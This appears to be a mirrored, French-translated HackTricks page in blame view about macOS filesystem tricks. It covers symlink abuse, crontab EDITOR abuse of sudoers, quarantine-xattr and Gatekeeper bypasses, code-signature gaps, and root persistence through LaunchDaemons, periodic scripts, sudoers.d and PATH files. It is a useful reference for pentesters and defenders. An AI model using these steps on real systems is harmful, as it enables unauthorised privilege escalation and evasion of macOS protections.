Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-01-10 12:18:52 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md

298 lines
13 KiB
Markdown
Raw Normal View History

Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:56:40 +00:00
# Astuces FS macOS
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:45:57 +00:00
<details>
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-01-05 11:49:07 +00:00
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:45:57 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-01-05 11:49:07 +00:00
Autres moyens de soutenir HackTricks :
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
* Obtenez le [**merchandising officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La Famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-moi** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux dépôts github** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:45:57 +00:00
</details>
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:57 +00:00
## Combinaisons de permissions POSIX
Permissions dans un **répertoire** :
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:56:40 +00:00
* **read** - vous pouvez **énumérer** les entrées du répertoire
* **write** - vous pouvez **supprimer/écrire** des **fichiers** dans le répertoire et vous pouvez **supprimer des dossiers vides**.
* Mais vous **ne pouvez pas supprimer/modifier des dossiers non vides** à moins d'avoir des permissions d'écriture dessus.
* Vous **ne pouvez pas modifier le nom d'un dossier** à moins de le posséder.
* **execute** - vous êtes **autorisé à traverser** le répertoire - si vous n'avez pas ce droit, vous ne pouvez pas accéder à aucun fichier à l'intérieur, ni dans aucun sous-répertoire.
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:57 +00:00
### Combinaisons dangereuses
**Comment écraser un fichier/dossier appartenant à root**, mais :
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:56:40 +00:00
* Un **propriétaire de répertoire parent** dans le chemin est l'utilisateur
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-01-05 11:49:07 +00:00
* Un **propriétaire de répertoire parent** dans le chemin est un **groupe d'utilisateurs** avec **accès en écriture**
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:56:40 +00:00
* Un **groupe d'utilisateurs** a un accès **write** au **fichier**
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:57 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:56:40 +00:00
Avec l'une des combinaisons précédentes, un attaquant pourrait **injecter** un **lien sym/hard** sur le chemin attendu pour obtenir une écriture arbitraire privilégiée.
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:57 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:56:40 +00:00
### Cas spécial de dossier root R+X
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:57 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:56:40 +00:00
Si un **répertoire** contient des fichiers où **seul root a un accès R+X**, ceux-ci ne sont **accessibles à personne d'autre**. Ainsi, une vulnérabilité permettant de **déplacer un fichier lisible par un utilisateur**, qui ne peut pas être lu à cause de cette **restriction**, de ce dossier **vers un autre**, pourrait être exploitée pour lire ces fichiers.
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:57 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:56:40 +00:00
Exemple sur : [https://theevilbit.github.io/posts/exploiting\_directory\_permissions\_on\_macos/#nix-directory-permissions](https://theevilbit.github.io/posts/exploiting\_directory\_permissions\_on\_macos/#nix-directory-permissions)
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:57 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-11-01 18:41:12 +00:00
## Lien symbolique / Lien physique
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:57 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:56:40 +00:00
Si un processus privilégié écrit des données dans un **fichier** qui pourrait être **contrôlé** par un **utilisateur moins privilégié**, ou qui aurait pu être **préalablement créé** par un utilisateur moins privilégié. L'utilisateur pourrait simplement **le pointer vers un autre fichier** via un lien symbolique ou physique, et le processus privilégié écrira sur ce fichier.
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:57 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-01-05 11:49:07 +00:00
Vérifiez dans les autres sections où un attaquant pourrait **abuser d'une écriture arbitraire pour escalader des privilèges**.
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:57 +00:00
Translated ['README.md', 'backdoors/salseo.md', 'forensics/basic-forensi
2023-12-16 14:33:49 +00:00
## .fileloc
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-01-05 11:49:07 +00:00
Les fichiers avec l'extension **`.fileloc`** peuvent pointer vers d'autres applications ou binaires de sorte que lorsqu'ils sont ouverts, l'application/binaire sera celui exécuté.\
Translated ['README.md', 'backdoors/salseo.md', 'forensics/basic-forensi
2023-12-16 14:33:49 +00:00
Exemple :
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>URL</key>
<string>file:///System/Applications/Calculator.app</string>
<key>URLPrefix</key>
<integer>0</integer>
</dict>
</plist>
```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:56:40 +00:00
## Descripteur de fichier arbitraire
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:45:57 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-01-05 11:49:07 +00:00
Si vous pouvez amener un **processus à ouvrir un fichier ou un dossier avec des privilèges élevés**, vous pouvez abuser de **`crontab`** pour ouvrir un fichier dans `/etc/sudoers.d` avec **`EDITOR=exploit.py`**, ainsi `exploit.py` obtiendra le descripteur de fichier pour le fichier à l'intérieur de `/etc/sudoers` et en abusera.
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:45:57 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:56:40 +00:00
Par exemple : [https://youtu.be/f1HA5QhLQ7Y?t=21098](https://youtu.be/f1HA5QhLQ7Y?t=21098)
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:45:57 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-01-05 11:49:07 +00:00
## Éviter les astuces d'attributs xattrs de quarantaine
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:45:57 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-01-05 11:49:07 +00:00
### Le supprimer
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-11-01 18:41:12 +00:00
```bash
xattr -d com.apple.quarantine /path/to/file_or_app
```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-01-05 11:49:07 +00:00
### Drapeau uchg / uchange / uimmutable
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:45:57 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-11-01 18:41:12 +00:00
Si un fichier/dossier possède cet attribut immuable, il ne sera pas possible d'y ajouter un xattr.
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:45:57 +00:00
```bash
echo asd > /tmp/asd
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:57 +00:00
chflags uchg /tmp/asd # "chflags uchange /tmp/asd" or "chflags uimmutable /tmp/asd"
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:45:57 +00:00
xattr -w com.apple.quarantine "" /tmp/asd
xattr: [Errno 1] Operation not permitted: '/tmp/asd'
ls -lO /tmp/asd
# check the "uchg" in the output
```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:56:40 +00:00
### Montage devfs
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:45:57 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:56:40 +00:00
Un montage **devfs** **ne prend pas en charge xattr**, plus d'informations dans [**CVE-2023-32364**](https://gergelykalman.com/CVE-2023-32364-a-macOS-sandbox-escape-by-mounting.html)
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:45:57 +00:00
```bash
mkdir /tmp/mnt
mount_devfs -o noowners none "/tmp/mnt"
chmod 777 /tmp/mnt
mkdir /tmp/mnt/lol
xattr -w com.apple.quarantine "" /tmp/mnt/lol
xattr: [Errno 1] Operation not permitted: '/tmp/mnt/lol'
```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:56:40 +00:00
### writeextattr ACL
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:45:57 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-01-05 11:49:07 +00:00
Cette ACL empêche l'ajout de `xattrs` au fichier.
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:45:57 +00:00
```bash
rm -rf /tmp/test*
echo test >/tmp/test
chmod +a "everyone deny write,writeattr,writeextattr,writesecurity,chown" /tmp/test
ls -le /tmp/test
ditto -c -k test test.zip
# Download the zip from the browser and decompress it, the file should be without a quarantine xattr
cd /tmp
echo y | rm test
# Decompress it with ditto
ditto -x -k --rsrc test.zip .
ls -le /tmp/test
# Decompress it with open (if sandboxed decompressed files go to the Downloads folder)
open test.zip
sleep 1
ls -le /tmp/test
```
### **com.apple.acl.text xattr + AppleDouble**
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:56:40 +00:00
Le format de fichier **AppleDouble** copie un fichier incluant ses ACEs.
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:45:57 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:56:40 +00:00
Dans le [**code source**](https://opensource.apple.com/source/Libc/Libc-391/darwin/copyfile.c.auto.html), il est possible de voir que la représentation textuelle de l'ACL stockée dans l'xattr appelé **`com.apple.acl.text`** va être définie comme ACL dans le fichier décompressé. Ainsi, si vous avez compressé une application dans un fichier zip avec le format de fichier **AppleDouble** avec une ACL qui empêche d'autres xattrs d'être écrits dessus... l'xattr de quarantaine n'a pas été défini dans l'application :
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:45:57 +00:00
Consultez le [**rapport original**](https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/) pour plus d'informations.
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:56:40 +00:00
Pour reproduire cela, nous devons d'abord obtenir la chaîne acl correcte :
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:45:57 +00:00
```bash
# Everything will be happening here
mkdir /tmp/temp_xattrs
cd /tmp/temp_xattrs
# Create a folder and a file with the acls and xattr
mkdir del
mkdir del/test_fold
echo test > del/test_fold/test_file
chmod +a "everyone deny write,writeattr,writeextattr,writesecurity,chown" del/test_fold
chmod +a "everyone deny write,writeattr,writeextattr,writesecurity,chown" del/test_fold/test_file
ditto -c -k del test.zip
# uncomporess to get it back
ditto -x -k --rsrc test.zip .
ls -le test
```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:56:40 +00:00
(Notez que même si cela fonctionne, le sandbox écrit l'attribut xattr de quarantaine avant)
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:45:57 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:56:40 +00:00
Pas vraiment nécessaire mais je le laisse là au cas où :
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:45:57 +00:00
{% content-ref url="macos-xattr-acls-extra-stuff.md" %}
[macos-xattr-acls-extra-stuff.md](macos-xattr-acls-extra-stuff.md)
{% endcontent-ref %}
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-11-01 16:27:14 +00:00
## Contourner les signatures de code
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:56:40 +00:00
Les bundles contiennent le fichier **`_CodeSignature/CodeResources`** qui contient le **hash** de chaque **fichier** dans le **bundle**. Notez que le hash de CodeResources est également **intégré dans l'exécutable**, donc nous ne pouvons pas non plus interférer avec cela.
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-11-01 16:27:14 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:56:40 +00:00
Cependant, il existe certains fichiers dont la signature ne sera pas vérifiée, ceux-ci ont la clé omit dans le plist, comme :
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-11-01 16:27:14 +00:00
```xml
<dict>
...
<key>rules</key>
<dict>
...
<key>^Resources/.*\.lproj/locversion.plist$</key>
<dict>
<key>omit</key>
<true/>
<key>weight</key>
<real>1100</real>
</dict>
...
</dict>
<key>rules2</key>
...
<key>^(.*/)?\.DS_Store$</key>
<dict>
<key>omit</key>
<true/>
<key>weight</key>
<real>2000</real>
</dict>
...
<key>^PkgInfo$</key>
<dict>
<key>omit</key>
<true/>
<key>weight</key>
<real>20</real>
</dict>
...
<key>^Resources/.*\.lproj/locversion.plist$</key>
<dict>
<key>omit</key>
<true/>
<key>weight</key>
<real>1100</real>
</dict>
...
</dict>
```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:56:40 +00:00
Il est possible de calculer la signature d'une ressource depuis le cli avec :
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-11-04 20:06:46 +00:00
{% code overflow="wrap" %}
```bash
openssl dgst -binary -sha1 /System/Cryptexes/App/System/Applications/Safari.app/Contents/Resources/AppIcon.icns | openssl base64
```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:56:40 +00:00
{% endcode %}
## Monter des dmgs
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:57 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:56:40 +00:00
Un utilisateur peut monter un dmg personnalisé même par-dessus certains dossiers existants. Voici comment vous pourriez créer un package dmg personnalisé avec un contenu personnalisé :
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:57 +00:00
{% code overflow="wrap" %}
```bash
# Create the volume
hdiutil create /private/tmp/tmp.dmg -size 2m -ov -volname CustomVolName -fs APFS 1>/dev/null
mkdir /private/tmp/mnt
# Mount it
hdiutil attach -mountpoint /private/tmp/mnt /private/tmp/tmp.dmg 1>/dev/null
# Add custom content to the volume
mkdir /private/tmp/mnt/custom_folder
echo "hello" > /private/tmp/mnt/custom_folder/custom_file
# Detach it
hdiutil detach /private/tmp/mnt 1>/dev/null
# Next time you mount it, it will have the custom content you wrote
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-11-01 16:51:06 +00:00
# You can also create a dmg from an app using:
hdiutil create -srcfolder justsome.app justsome.dmg
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:57 +00:00
```
{% endcode %}
## Écritures arbitraires
### Scripts sh périodiques
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:56:40 +00:00
Si votre script peut être interprété comme un **script shell**, vous pourriez écraser le script shell **`/etc/periodic/daily/999.local`** qui sera déclenché tous les jours.
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:57 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:56:40 +00:00
Vous pouvez **simuler** une exécution de ce script avec : **`sudo periodic daily`**
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:57 +00:00
### Daemons
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-01-05 11:49:07 +00:00
Écrire un **LaunchDaemon** arbitraire comme **`/Library/LaunchDaemons/xyz.hacktricks.privesc.plist`** avec un plist exécutant un script arbitraire tel que :
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:57 +00:00
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.sample.Load</string>
<key>ProgramArguments</key>
<array>
<string>/Applications/Scripts/privesc.sh</string>
</array>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:56:40 +00:00
```markdown
Créez simplement le script `/Applications/Scripts/privesc.sh` avec les **commandes** que vous souhaitez exécuter en tant que root.
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:57 +00:00
### Fichier Sudoers
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:56:40 +00:00
Si vous avez un **écriture arbitraire**, vous pourriez créer un fichier dans le dossier **`/etc/sudoers.d/`** vous accordant les privilèges **sudo**.
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:57 +00:00
Translated ['generic-methodologies-and-resources/external-recon-methodol
2023-12-11 09:52:39 +00:00
### Fichiers PATH
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:56:40 +00:00
Le fichier **`/etc/paths`** est l'un des principaux endroits qui peuple la variable d'environnement PATH. Vous devez être root pour le remplacer, mais si un script d'un **processus privilégié** exécute une **commande sans le chemin complet**, vous pourriez être capable de **détourner** cela en modifiant ce fichier.
Translated ['generic-methodologies-and-resources/external-recon-methodol
2023-12-11 09:52:39 +00:00
&#x20;Vous pouvez également écrire des fichiers dans **`/etc/paths.d`** pour charger de nouveaux dossiers dans la variable d'environnement `PATH`.
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-23 00:15:57 +00:00
## Références
* [https://theevilbit.github.io/posts/exploiting\_directory\_permissions\_on\_macos/](https://theevilbit.github.io/posts/exploiting\_directory\_permissions\_on\_macos/)
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:45:57 +00:00
<details>
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-01-05 11:49:07 +00:00
<summary><strong>Apprenez le hacking AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:45:57 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-01-05 11:49:07 +00:00
Autres moyens de soutenir HackTricks :
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:56:40 +00:00
* Obtenez le [**merchandising officiel PEASS & HackTricks**](https://peass.creator-spring.com)
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-01-05 11:49:07 +00:00
* Découvrez [**La Famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection d'[**NFTs**](https://opensea.io/collection/the-peass-family) exclusifs
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Partagez vos astuces de hacking en soumettant des PR aux dépôts github** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-10-18 17:45:57 +00:00
</details>
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2023-12-27 01:56:40 +00:00
```
Reference in a new issue Copy permalink